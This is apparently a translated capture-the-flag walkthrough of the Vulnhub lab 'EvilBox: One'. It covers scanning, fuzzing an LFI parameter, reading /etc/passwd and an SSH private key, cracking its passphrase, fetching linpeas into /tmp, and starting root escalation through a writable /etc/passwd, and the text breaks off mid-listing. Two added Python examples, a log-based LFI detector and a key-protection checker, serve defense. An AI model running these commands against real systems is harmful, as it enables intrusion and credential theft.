Vulnhub: EvilBox 1, a Super Detailed Walkthrough

EvilBox

Author: jason_huawen

Target machine information

Name: EvilBox: One

Address:

https://www.vulnhub.com/entry/evilbox-one,736/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:c7:64:09      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.166  08:00:27:a0:af:37      1      60  PCS Systemtechnik GmbH  

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.166.

NMAP scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.166 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-11 02:35 EST
Nmap scan report for bogon (192.168.56.166)
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
|   256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_  256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:A0:AF:37 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.09 seconds
                                                                             

The NMAP scan shows that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).

Getting a shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ curl http://192.168.56.166/robots.txt
Hello H4x0r
                

H4x0r: what hint is the author giving us here? Could it be an XOR operation? XOR with what?

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ nikto -h http://192.168.56.166                             
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.166
+ Target Hostname:    192.168.56.166
+ Target Port:        80
+ Start Time:         2023-01-11 02:37:34 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5c9a9bb4d712e, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2023-01-11 02:38:37 (GMT-5) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n

                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ curl http://192.168.56.166/secret/   

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.166
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/01/11 02:39:22 Starting gobuster in directory enumeration mode
===============================================================
/secret               (Status: 301) [Size: 317] [--> http://192.168.56.166/secret/]
/server-status        (Status: 403) [Size: 279]
Progress: 220344 / 220561 (99.90%)
===============================================================
2023/01/11 02:40:07 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.166
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              js,txt,php,html,sh
[+] Timeout:                 10s
===============================================================
2023/01/11 02:40:17 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/robots.txt           (Status: 200) [Size: 12]
/secret               (Status: 301) [Size: 317] [--> http://192.168.56.166/secret/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1322160 / 1323366 (99.91%)
===============================================================
2023/01/11 02:45:02 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/seclists/Discovery/Web-Content/ -x .php,.html,.sh,.js,.txt
          
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.html,.sh,.js,.txt 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.166
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,sh,js,txt
[+] Timeout:                 10s
===============================================================
2023/01/11 02:45:28 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/secret               (Status: 301) [Size: 317] [--> http://192.168.56.166/secret/]
/robots.txt           (Status: 200) [Size: 12]
/server-status        (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
Progress: 133379 / 373710 (35.69%)[ERROR] 2023/01/11 02:45:56 [!] parse "http://192.168.56.166/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:56 [!] parse "http://192.168.56.166/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:56 [!] parse "http://192.168.56.166/besalu\t.sh": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:56 [!] parse "http://192.168.56.166/besalu\t.js": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:56 [!] parse "http://192.168.56.166/besalu\t.txt": net/url: invalid control character in URL
Progress: 142044 / 373710 (38.01%)[ERROR] 2023/01/11 02:45:58 [!] parse "http://192.168.56.166/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:58 [!] parse "http://192.168.56.166/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:58 [!] parse "http://192.168.56.166/error\x1f_log.sh": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:58 [!] parse "http://192.168.56.166/error\x1f_log.js": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:58 [!] parse "http://192.168.56.166/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:58 [!] parse "http://192.168.56.166/error\x1f_log.php": net/url: invalid control character in URL
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
Progress: 372844 / 373710 (99.77%)
===============================================================
2023/01/11 02:46:51 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.html,.sh,.js,.txt 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.166
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              sh,js,txt,php,html
[+] Timeout:                 10s
===============================================================
2023/01/11 02:47:08 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htaccess.sh         (Status: 403) [Size: 279]
/.htaccess.js         (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd.js         (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/.htpasswd.sh         (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/robots.txt           (Status: 200) [Size: 12]
/robots.txt           (Status: 200) [Size: 12]
/secret               (Status: 301) [Size: 317] [--> http://192.168.56.166/secret/]
/server-status        (Status: 403) [Size: 279]
Progress: 121831 / 122862 (99.16%)
===============================================================
2023/01/11 02:47:31 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/seclists/Discovery/Web-Content/common -x .php,.html,.sh,.js,.txt
Error: error on parsing arguments: wordlist file "/usr/share/seclists/Discovery/Web-Content/common" does not exist: stat /usr/share/seclists/Discovery/Web-Content/common: no such file or directory
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.166
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,sh,js,txt
[+] Timeout:                 10s
===============================================================
2023/01/11 02:47:49 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 279]
/.hta.php             (Status: 403) [Size: 279]
/.hta.html            (Status: 403) [Size: 279]
/.hta.sh              (Status: 403) [Size: 279]
/.hta.js              (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.hta.txt             (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htaccess.sh         (Status: 403) [Size: 279]
/.htaccess.js         (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htpasswd.sh         (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/.htpasswd.js         (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/index.html           (Status: 200) [Size: 10701]
/robots.txt           (Status: 200) [Size: 12]
/robots.txt           (Status: 200) [Size: 12]
/secret               (Status: 301) [Size: 317] [--> http://192.168.56.166/secret/]
/server-status        (Status: 403) [Size: 279]
Progress: 27774 / 28284 (98.20%)
===============================================================
2023/01/11 02:47:54 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ dirb http://192.168.56.166

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Jan 11 02:48:57 2023
URL_BASE: http://192.168.56.166/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.166/ ----
+ http://192.168.56.166/index.html (CODE:200|SIZE:10701)                                                                     
+ http://192.168.56.166/robots.txt (CODE:200|SIZE:12)                                                                        
==> DIRECTORY: http://192.168.56.166/secret/                                                                                 
+ http://192.168.56.166/server-status (CODE:403|SIZE:279)                                                                    
                                                                                                                             
---- Entering directory: http://192.168.56.166/secret/ ----
+ http://192.168.56.166/secret/index.html (CODE:200|SIZE:4)                                                                  
                                                                                                                             
-----------------
END_TIME: Wed Jan 11 02:49:01 2023
DOWNLOADED: 9224 - FOUND: 4


After scanning the target's directories and files with gobuster and dirb against every major wordlist, nothing turned up. Strange: isn't this box rated easy? Ha, let's try dirbuster:

Amazingly, it found an evil.php file under the /secret directory. In fact, once gobuster had found /secret, we should have gone on to scan that directory for subdirectories and files!

Accessing the evil.php file

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ curl http://192.168.56.166/secret/evil.php

No output at all; it probably needs a parameter.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ wfuzz -c -u http://192.168.56.166/secret/evil.php?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.166/secret/evil.php?FUZZ=id
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                      
=====================================================================


Total time: 280.3646
Processed Requests: 220560
Filtered Requests: 220560
Requests/sec.: 786.6896

No parameter was found by fuzzing; change the payload and fuzz again.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ wfuzz -c -u http://192.168.56.166/secret/evil.php?FUZZ=../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.166/secret/evil.php?FUZZ=../../../../../etc/passwd
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                      
=====================================================================

000013351:   200        26 L     38 W       1398 Ch     "command"  

At this point fuzzing has revealed the parameter name: command.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ curl http://192.168.56.166/secret/evil.php?command=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

We now have the user name mowree; naturally, the next step is to check whether that user has an SSH private key file.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ curl http://192.168.56.166/secret/evil.php?command=/home/mowree/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
-----END RSA PRIVATE KEY-----

Ha, a nice surprise! Let's continue.
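From the defender's side, the evil.php?command=... requests above leave a clear trail in the Apache access log. The following is an added example (not part of the original post) that parses constructed combined-format log lines modelled on this walkthrough and flags file-read probes; the log lines, the client IPs and the user agents are invented sample data.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-log lines modelled on the evil.php?command=...
# requests in this walkthrough (sample data, not a real server log).
SAMPLE_LOG = """\
192.168.56.146 - - [11/Jan/2023:03:01:12 -0500] "GET /secret/evil.php?command=id HTTP/1.1" 200 0 "-" "Wfuzz/3.1.0"
192.168.56.146 - - [11/Jan/2023:03:05:40 -0500] "GET /secret/evil.php?command=../../../../../etc/passwd HTTP/1.1" 200 1398 "-" "Wfuzz/3.1.0"
192.168.56.146 - - [11/Jan/2023:03:06:02 -0500] "GET /secret/evil.php?command=/etc/passwd HTTP/1.1" 200 1398 "-" "curl/7.87.0"
192.168.56.146 - - [11/Jan/2023:03:06:30 -0500] "GET /secret/evil.php?command=/home/mowree/.ssh/id_rsa HTTP/1.1" 200 1766 "-" "curl/7.87.0"
192.168.56.1 - - [11/Jan/2023:03:07:00 -0500] "GET /index.html HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
192.168.56.1 - - [11/Jan/2023:03:07:05 -0500] "GET /secret/evil.php?command=%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client, ident, user, [time], "request", status, bytes, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Files an LFI probe typically goes after; a hit here plus a 200 with a body
# usually means the read succeeded.
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/.ssh/", "/proc/self/", "/var/log/")


def classify_value(value):
    """Return the reasons a query-parameter value looks like a file-read probe."""
    decoded = unquote(unquote(value))  # second pass catches double-encoding (%252e)
    reasons = []
    if "../" in decoded or "..\\" in decoded:
        reasons.append("traversal")
    if any(p in decoded for p in SENSITIVE_PATHS):
        reasons.append("sensitive-file")
    return reasons


def scan_log(text):
    """Parse access-log lines and return one finding per suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        size = 0 if m.group("size") == "-" else int(m.group("size"))
        status = int(m.group("status"))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            reasons = classify_value(value)
            if not reasons:
                continue
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": url.path,
                "param": name,
                "value": value,
                "reasons": reasons,
                # a 200 with a non-empty body is the signature of a successful read
                "likely_success": status == 200 and size > 0,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "READ OK" if f["likely_success"] else "probe"
        print(f"{f['time']} {f['ip']} {f['path']}?{f['param']}= {f['value']} "
              f"[{','.join(f['reasons'])}] {flag}")
```

The 220,560-request wfuzz runs shown above would also stand out as one client sending hundreds of distinct parameter names against a single script in a few minutes, which is worth a separate rate-based rule.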

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ vim id_rsa   
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ cat id_rsa                                                                 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E

-----END RSA PRIVATE KEY-----
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ chmod 400 id_rsa 
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ ssh -i id_rsa mowree@192.168.56.166
Enter passphrase for key 'id_rsa': 

It appears the private key file is passphrase-protected.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ ssh2john id_rsa >hashes            
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes    
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (id_rsa)     
1g 0:00:00:00 DONE (2023-01-11 03:09) 4.761g/s 5942p/s 5942c/s 5942C/s pedro..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
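John cracked this key in under a second because the legacy PEM format (Proc-Type: 4,ENCRYPTED with DES-EDE3-CBC) derives its key with a single MD5 pass, which is what the "Cost 1 ... MD5/3DES" line reports. The following added example (not from the original post) classifies how an SSH private key is protected at rest; the key samples are constructed for the example, with the page's legacy headers placed over a dummy body, and _openssh_sample() builds only the leading fields of an openssh-key-v1 blob.

```python
import base64
import struct

OPENSSH_BEGIN = "-----BEGIN OPENSSH PRIVATE KEY-----"

# Constructed samples, not real keys: the legacy PEM headers from this walkthrough
# over a dummy body, and a minimal openssh-key-v1 header built by _openssh_sample().
LEGACY_SAMPLE = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE=
-----END RSA PRIVATE KEY-----
"""


def _openssh_sample(cipher, kdf):
    """Build just the leading fields of an openssh-key-v1 blob (magic, cipher, kdf)."""
    raw = b"openssh-key-v1\x00"
    for s in (cipher, kdf):
        raw += struct.pack(">I", len(s)) + s.encode()
    raw += struct.pack(">I", 0)  # empty kdfoptions; the key material itself is omitted
    b64 = base64.b64encode(raw).decode()
    return f"{OPENSSH_BEGIN}\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


def _read_string(buf, off):
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def classify_private_key(text):
    """Report the at-rest protection of an SSH private key: format, cipher, KDF, verdict."""
    lines = [l.strip() for l in text.strip().splitlines()]
    if not lines:
        raise ValueError("empty key file")
    info = {"format": None, "encrypted": False, "cipher": None, "kdf": None}
    if lines[0] == OPENSSH_BEGIN:
        raw = base64.b64decode("".join(l for l in lines[1:] if not l.startswith("-----")))
        magic = b"openssh-key-v1\x00"
        if not raw.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_string(raw, len(magic))
        kdf, _ = _read_string(raw, off)
        info.update(format="openssh-key-v1", cipher=cipher.decode(), kdf=kdf.decode(),
                    encrypted=cipher != b"none")
    elif lines[0].startswith("-----BEGIN ") and lines[0].endswith(" PRIVATE KEY-----"):
        info["format"] = "pem"
        headers = {}
        for l in lines[1:]:
            if ":" not in l:  # PEM headers end at the first blank line
                break
            k, v = l.split(":", 1)
            headers[k.strip()] = v.strip()
        if headers.get("Proc-Type", "").endswith("ENCRYPTED"):
            info["encrypted"] = True
            info["cipher"] = headers.get("DEK-Info", "").split(",")[0] or None
            # OpenSSL legacy PEM derives the key with one MD5 pass over passphrase+IV
            # (EVP_BytesToKey), so each guess costs one hash: cheap to crack offline.
            info["kdf"] = "md5-evp-bytestokey"
    else:
        raise ValueError("unrecognised key header")

    if not info["encrypted"]:
        info["verdict"] = "unencrypted: anyone who can read the file owns the key"
    elif info["format"] == "pem":
        info["verdict"] = "weak: legacy PEM encryption with MD5 key derivation"
    elif info["kdf"] == "bcrypt":
        info["verdict"] = "ok: openssh-key-v1 with bcrypt KDF"
    else:
        info["verdict"] = f"review: unexpected kdf '{info['kdf']}'"
    return info


if __name__ == "__main__":
    for sample in (LEGACY_SAMPLE,
                   _openssh_sample("aes256-ctr", "bcrypt"),
                   _openssh_sample("none", "none")):
        print(classify_private_key(sample))
```

A key in the "weak" class can be re-wrapped in place with `ssh-keygen -p -o -a 100 -f id_rsa`, which moves it to the openssh-key-v1 format with a bcrypt KDF of 100 rounds; a strong passphrase still matters, since the key sat in a web-readable home directory here.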

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ ssh -i id_rsa mowree@192.168.56.166
Enter passphrase for key 'id_rsa': 
Enter passphrase for key 'id_rsa': 
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
mowree@EvilBoxOne:~$ 

mowree@EvilBoxOne:~$ cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
mowree@EvilBoxOne:~$ 

At this point we have the User Flag.

Privilege escalation

Upload the linpeas.sh script to the /tmp directory on the target host, make it executable, and run it:

mowree@EvilBoxOne:/tmp$ wget http://192.168.56.146:8000/linpeas.sh
--2023-01-11 09:13:20--  http://192.168.56.146:8000/linpeas.sh
Conectando con 192.168.56.146:8000... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 765823 (748K) [text/x-sh]
Grabando a: “linpeas.sh”

linpeas.sh                      100%[=====================================================>] 747,87K  --.-KB/s    en 0,005s  

2023-01-11 09:13:20 (159 MB/s) - “linpeas.sh” guardado [765823/765823]

mowree@EvilBoxOne:/tmp$ chmod +x linpeas.sh
mowree@EvilBoxOne:/tmp$ ./linpeas.sh

From the linpeas.sh output:

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d                                    
                                                                                                                              
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable                                                             
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No                                                                                  
═╣ Can I read shadow plists? ............ No                                                                                  
═╣ Can I write shadow plists? ........... No                                                                                  
═╣ Can I read opasswd file? ............. No                                                                                  
═╣ Can I write in network-scripts? ...... No                                                                                  
═╣ Can I read root folder? .............. No    

The /etc/passwd file is both readable and writable by our user.

Create a password hash locally on Kali Linux (here jason is the salt value, chosen arbitrarily):

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ openssl passwd -6 -salt jason 123456
$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41

Append the user name jason together with the password hash just created to the /etc/passwd file:

mowree@EvilBoxOne:/tmp$ nano /etc/passwd
mowree@EvilBoxOne:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
